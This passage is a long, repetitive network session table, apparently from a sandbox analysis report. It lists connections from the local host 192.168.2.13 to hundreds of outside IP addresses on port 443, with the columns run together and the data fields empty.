                                                22606192.168.2.1348022132.102.91.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22607192.168.2.1347082138.167.43.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22608192.168.2.1353372108.224.34.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22609192.168.2.1336748211.14.33.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22610192.168.2.1351968220.114.96.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22611192.168.2.1351424209.240.176.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22612192.168.2.1333050160.39.193.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22613192.168.2.1346520150.173.80.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22614192.168.2.136006273.182.229.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22615192.168.2.1342972130.217.158.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22616192.168.2.1336212115.233.237.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22617192.168.2.1345910211.68.186.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22618192.168.2.1356768200.237.248.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22619192.168.2.1357894202.226.200.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22620192.168.2.133890427.96.186.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22621192.168.2.134104835.170.118.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22622192.168.2.1359208171.217.156.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22623192.168.2.1353998162.27.84.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22624192.168.2.1347370111.167.156.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22625192.168.2.1359358203.170.83.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22626192.168.2.133537065.10.117.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22627192.168.2.133699289.188.232.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22628192.168.2.1346032223.147.151.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22629192.168.2.1360630200.116.88.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22630192.168.2.1356672217.46.166.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22631192.168.2.133538025.196.160.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22632192.168.2.1356858179.162.90.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22633192.168.2.1338942145.215.142.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22634192.168.2.1350300134.180.73.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22635192.168.2.1334522170.76.206.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22636192.168.2.133695423.80.243.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22637192.168.2.1359140110.183.198.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22638192.168.2.1356336139.90.168.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22639192.168.2.1355150197.240.160.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22640192.168.2.1346390112.26.184.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22641192.168.2.1342480102.34.156.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22642192.168.2.1348032135.170.133.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22643192.168.2.1351558148.121.84.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22644192.168.2.1352972108.66.254.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22645192.168.2.1353054206.25.136.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22646192.168.2.1351166213.126.135.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22647192.168.2.135906887.18.216.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22648192.168.2.1346398121.1.184.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22649192.168.2.133768227.233.165.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22650192.168.2.136013850.251.206.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22651192.168.2.1334106104.34.29.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22652192.168.2.135136892.13.222.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22653192.168.2.1350174185.171.173.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22654192.168.2.1340250133.57.13.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22655192.168.2.1350476123.155.249.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22656192.168.2.1348938216.218.250.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22657192.168.2.1336948193.133.118.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22658192.168.2.134561213.62.102.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22659192.168.2.1334326158.43.173.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22660192.168.2.13480424.86.85.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22661192.168.2.1336258194.225.23.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22662192.168.2.1353980204.183.136.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22663192.168.2.1351238167.83.9.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22664192.168.2.134838675.210.15.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22665192.168.2.1357712150.22.219.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22666192.168.2.1347486130.197.180.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22667192.168.2.135926644.26.139.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22668192.168.2.134288817.76.102.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22669192.168.2.1342944110.73.215.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22670192.168.2.134344254.54.157.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22671192.168.2.135464444.80.15.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22672192.168.2.1359372139.190.17.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22673192.168.2.1343106213.47.107.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22674192.168.2.1343132116.117.128.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22675192.168.2.1350360173.171.235.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22676192.168.2.1335356185.93.180.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22677192.168.2.1345382160.59.117.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22678192.168.2.133890470.193.208.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22679192.168.2.135785491.5.171.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22680192.168.2.1334470172.188.66.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22681192.168.2.1350324201.126.137.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22682192.168.2.13372488.18.220.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22683192.168.2.1333612209.150.247.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22684192.168.2.1336246112.26.167.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22685192.168.2.1349082183.8.115.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22686192.168.2.135622474.230.187.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22687192.168.2.136038851.20.172.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22688192.168.2.1351722188.131.244.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22689192.168.2.1350208150.107.106.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22690192.168.2.1352746211.91.233.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22691192.168.2.1345336185.139.134.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22692192.168.2.1336680153.194.54.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22693192.168.2.1354998193.101.120.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22694192.168.2.1352524104.159.26.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22695192.168.2.1348076139.58.228.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22696192.168.2.1334358113.137.252.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22697192.168.2.1333902208.50.113.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22698192.168.2.1354048199.160.143.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22699192.168.2.1349386219.110.193.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22700192.168.2.134881260.169.96.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22701192.168.2.1358826151.180.189.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22702192.168.2.135639236.88.106.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22703192.168.2.1359316198.28.215.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22704192.168.2.134218417.50.134.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22705192.168.2.13527362.30.231.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22706192.168.2.1345550165.5.150.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22707192.168.2.136039452.249.249.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22708192.168.2.133523464.180.228.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22709192.168.2.1340822163.71.176.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22710192.168.2.1355332124.74.173.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22711192.168.2.135929238.245.146.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22712192.168.2.134913295.62.29.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22713192.168.2.134976893.41.39.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22714192.168.2.1353222102.228.154.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22715192.168.2.1360688196.184.67.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22716192.168.2.135468874.73.127.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22717192.168.2.134388090.254.250.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22718192.168.2.135930683.19.182.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22719192.168.2.1339500178.100.6.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22720192.168.2.133856099.239.164.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22721192.168.2.1350824132.241.161.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22722192.168.2.1350572104.222.125.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22723192.168.2.133633637.196.130.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22724192.168.2.1334910116.179.125.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22725192.168.2.1338318173.27.130.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22726192.168.2.135535017.154.109.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22727192.168.2.133831242.34.37.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22728192.168.2.135952841.33.217.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22729192.168.2.134242671.207.211.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22730192.168.2.1341878210.87.151.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22731192.168.2.135192271.158.101.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22732192.168.2.1346954165.75.234.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22733192.168.2.1359448217.203.157.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22734192.168.2.133562689.96.196.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22735192.168.2.1350994122.208.30.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22736192.168.2.1347724173.131.167.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22737192.168.2.134201877.136.192.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22738192.168.2.1350892212.218.52.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22739192.168.2.1351036192.201.57.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22740192.168.2.1346668178.80.57.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22741192.168.2.135220878.182.76.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22742192.168.2.1337828149.128.160.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22743192.168.2.135323840.131.16.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22744192.168.2.1356078166.88.74.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22745192.168.2.133711818.10.167.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22746192.168.2.134480458.78.245.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22747192.168.2.1344786109.234.117.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22748192.168.2.1353174136.73.189.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22749192.168.2.134511458.33.72.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22750192.168.2.1350536211.81.131.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22751192.168.2.1353972196.160.171.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22752192.168.2.1352714100.161.222.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22753192.168.2.1336106124.71.122.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22754192.168.2.1338794154.240.44.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22755192.168.2.1333154210.49.186.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22756192.168.2.135909096.71.57.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22757192.168.2.134311449.19.163.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22758192.168.2.1338992128.168.43.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22759192.168.2.1334318112.127.105.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22760192.168.2.135270468.158.194.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22761192.168.2.133970073.159.232.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22762192.168.2.1353452193.223.232.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22763192.168.2.1352462191.216.114.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22764192.168.2.135847638.202.142.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22765192.168.2.133960887.82.24.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22766192.168.2.135927092.223.150.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22767192.168.2.1353890178.135.251.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22768192.168.2.1348392196.214.207.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22769192.168.2.1357790189.87.110.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22770192.168.2.1351126189.215.246.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22771192.168.2.1357514201.58.231.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22772192.168.2.134070470.234.165.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22773192.168.2.134536057.233.54.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22774192.168.2.13513928.253.63.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22775192.168.2.13331801.223.36.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22776192.168.2.1351856121.146.213.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22777192.168.2.133503683.10.167.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22778192.168.2.135440431.189.246.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22779192.168.2.1359178106.28.31.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22780192.168.2.1333596122.4.79.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22781192.168.2.1342590181.156.236.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22782192.168.2.135832219.61.18.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22783192.168.2.1345184196.172.205.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22784192.168.2.133493472.30.130.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22785192.168.2.1338426156.88.199.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22786192.168.2.133928086.5.28.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22787192.168.2.133730267.151.240.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22788192.168.2.134925835.163.40.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22789192.168.2.135662446.85.164.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22790192.168.2.1333394211.204.35.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22791192.168.2.1355334219.38.63.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22792192.168.2.1350186134.233.151.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22793192.168.2.133931272.72.25.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22794192.168.2.1344468161.209.118.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22795192.168.2.1352114189.171.227.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22796192.168.2.1340638135.226.111.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22797192.168.2.1358274182.42.231.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22798192.168.2.133597467.120.181.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22799192.168.2.1354728185.24.100.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22800192.168.2.1332954122.94.59.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22801192.168.2.1344982101.227.147.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22802192.168.2.133596066.152.231.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22803192.168.2.1357192163.165.138.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22804192.168.2.1343664209.113.61.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22805192.168.2.133519060.112.207.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22806192.168.2.1339236136.19.142.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22807192.168.2.1350068156.133.114.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22808192.168.2.1336640156.187.223.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22809192.168.2.135809873.239.30.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22810192.168.2.1356086188.173.162.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22811192.168.2.133986035.14.183.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22812192.168.2.135980860.225.218.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22813192.168.2.135682034.196.36.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22814192.168.2.1356856100.195.88.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22815192.168.2.1335118217.150.93.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22816192.168.2.1359566190.225.197.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22817192.168.2.1349384183.236.146.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22818192.168.2.1334738139.115.43.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22819192.168.2.135779893.133.126.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22820192.168.2.1332938152.199.83.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22821192.168.2.1343948124.137.155.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22822192.168.2.1341696110.138.151.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22823192.168.2.134654458.37.210.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22824192.168.2.1334780200.60.113.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22825192.168.2.1334316113.118.209.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22826192.168.2.135212244.9.239.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22827192.168.2.135598250.208.224.139443
                                                TimestampBytes transferredDirectionData


